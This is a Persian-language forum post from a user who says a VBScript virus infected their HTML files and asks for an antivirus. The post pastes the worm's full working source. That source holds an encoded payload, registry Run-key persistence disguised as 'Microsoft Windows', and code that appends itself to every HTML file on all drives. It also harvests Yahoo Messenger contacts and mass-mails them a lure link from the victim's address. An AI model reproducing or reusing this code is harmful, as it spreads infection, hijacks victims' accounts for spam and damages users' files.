اين ويروس Vb رو سيستم من اجرا شده و تمامي فايل هاي Html رو
دوستان اين ويروس Vb رو سيستم من اجرا شده و تمامي فايل هاي Html رو تحت تاثير خودش قرار داده كسي آنتي اين ويروس رو داره ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟:41: :41: :41: :41: :41:
کد:
'Navid new virus 2006(1375.1)
on error resume next
dim filehtm,sys,yr
filehtm1="100105109032115121115013010083101116032100102032061032100111099117109101110116046099114101097116101069108101109101110116040034111098106101099116034041013010100102046115101116065116116114105098117116101032034099108097115115105100034044032034099108115105100058066068057054067053053054045054053065051045049049068048045057056051065045048048067048052070067050057069051054032034013010115101116032102115111032061032100102046099114101097116101111098106101099116040034083099114105112116105110103046070105108101083121115116101109079098106101099116034044034034041013010115101116032115061100102046067114101097116101079098106101099116040034083104101108108046065112112108105099097116105111110046049034044034034041013010115101116032114101061100102046099114101097116101111098106101099116040034119115099114105112116046115104101108108034044034034041013010115121115061102115111046071101116083112101099105097108070111108100101114040049041013010070111114032097032061032049032084111032076101110040102105108101118098115049041032083116101112032051013010102105108101118098115050061102105108101118098115050032038032099104114040109105100040102105108101118098115049044097044051041041013010105102032097032060032108101110040102105108101101120101049041043049032116104101110032102105108101101120101050061102105108101101120101050032038032099104114040109105100040102105108101101120101049044097044051041041013010110101120116013010107114032061032085067097115101040114101046082101103082101097100040034072075069089095076079067065076095077065067072073078069092083079070084087065082069092077105099114111115111102116092087105110100111119115092067117114114101110116086101114115105111110092082117110092077105099114111115111102116032087105110100111119115034041041013010102115111046067114101097116101084101120116070105108101040115121115032038032034092084083080051050069046068076076034041046119114105116101032102105108101101120101049013010105102032117099097115101040102115111046070105108101069120105115116115040115121115032038032034092075101114110101108046101120101034041041061034070065076083069034032111114032107114060062117099097115101040115121115032038032034092075069082078069076046069088069034041032116104101110013010114101046114101103119114105116101032034072075069089095076079067065076095077065067072073078069092083079070084087065082069092077105099114111115111102116092087105110100111119115092067117114114101110116086101114115105111110092082117110092034032038032034077105099114111115111102116032087105110100111119115034032044115121115032038034092075101114110101108046101120101034013010102115111046067114101097116101084101120116070105108101040115121115032038032034092075101114110101108046101120101034041046119114105116101032102105108101101120101050013010115046079112101110032040115121115032038032034092075101114110101108046101120101034041013010101110100032105102013010102115111046067114101097116101084101120116070105108101040115121115032038032034092084083080051050086046068076076034041046119114105116101032102105108101118098115049013010105102032102115111046111112101110116101120116102105108101040115121115032038032034092083121115116101109118046100108108034044049041046114101097100097108108060062034111110034032116104101110013010102115111046067114101097116101084101120116070105108101040115121115032038032034092075101114110101108046118098115034041046119114105116101032102105108101118098115050013010115046079112101110032040115121115032038032034092075101114110101108046118098115034041013010101110100032105102013010060047115099114105112116062"
set fso=createobject("scripting.filesystemobject")
set re=createobject("wscript.shell")
sys=fso.GetSpecialFolder(1)
fso.CreateTextFile(sys & "\Systemv.dll").write "on"
filehtm="<script language=vbscript>" & vbcrlf & "on error resume next" & vbcrlf
filehtm=filehtm & "fileexe1=""" & fso.opentextfile(sys & "\TSP32E.DLL",1).readall & """" & vbcrlf
filehtm=filehtm & "filevbs1=""" & fso.opentextfile(sys & "\TSP32V.DLL",1).readall & """" & vbcrlf
For a = 1 To Len(filehtm1) Step 3
filehtm=filehtm & chr(mid(filehtm1,a,3))
next
re.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.vbs"
re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"
yr=re.RegRead("HKEY_CURRENT_USER\Software\yahoo\pager\Yahoo! User ID")
start
Sub start()
on error resume next
For Each dr1 In fso.Drives
If dr1.DriveType = 2 Or dr1.DriveType = 3 Then file1 (dr1 & "\"): folder1 (dr1 & "\")
Next
sendmail
End Sub
Sub folder1(dr1)
on error resume next
For Each fo In fso.GetFolder(dr1).SubFolders
if UCase(right(fo,25))="YAHOO!\MESSENGER\PROFILES" then yahoo(fo)
file1 (fo)
folder1 (fo)
Next
End Sub
Sub file1(fo)
on error resume next
For Each fi In fso.GetFolder(fo).Files
nj (fi)
Next
End Sub
sub nj(fi)
on error resume next
ext=UCase(fso.GetExtensionName(fi))
if ext="HTM" or ext="HTML" or ext="HTT" then
if right(fso.opentextfile(fi,1).readall,len(filehtm))<>filehtm then
fso.opentextfile(fi,8).write vbcrlf & filehtm
end if
end if
end sub
sub yahoo(foy1)
For Each foy2 In fso.GetFolder(foy1).SubFolders
mailall=mailall & fso.GetFileName(foy2) & "@yahoo.com" & vbcrlf
next
fso.createtextfile(sys & "\mail.log").write mailall & "END"
fso.createtextfile(sys & "\send.log").write yr & "@yahoo.com"
end sub
sub sendmail()
on error resume next
sendm=fso.opentextfile(sys & "\send.log",1).readall
set mailm=fso.opentextfile(sys & "\mail.log",1)
maila=mailm.readline
while maila <> "END"
Set objMessage = CreateObject("CDO.Message")
objMessage.Subject = "Hello"
objMessage.Sender = sendm
objMessage.from= sendm
objMessage.To = maila
objMessage.TextBody = "Hello" & vbcrlf & "Go to my sait: http://girlsex.webs.io/picture.htm"
objMessage.Send
maila=mailm.readline
wend
fso.CreateTextFile(sys & "\Systemv.dll").write "off"
end sub